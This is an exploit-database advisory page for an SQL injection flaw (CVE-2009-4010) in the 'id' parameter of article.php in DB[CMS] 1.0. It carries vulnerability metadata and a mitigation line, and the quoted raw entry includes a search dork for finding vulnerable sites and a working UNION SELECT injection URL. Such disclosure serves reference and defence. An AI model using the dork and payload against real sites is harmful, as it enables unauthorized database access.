header-logo
Suggest Exploit
vendor:
DB[CMS]
by:
blackraptor
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DB[CMS]
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:debliteck:db[cms]:1.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

DB[CMS] (article.php) SQL Injection Vulnerability

DB[CMS] is vulnerable to SQL injection. An attacker can inject malicious SQL queries into the vulnerable parameter 'id' of the 'article.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

DB[CMS] (article.php) SQL Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: blackraptor
 
Mail: blackraptor@rocketmail.com
 
Script Home: http://www.debliteck.com/how.php
 
Dork: "Designed and Developed by Debliteck Ltd"
 
-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/article.php?id=59 union select 1--  (SQL)

Navigation

Suggest Exploit

Services By CQR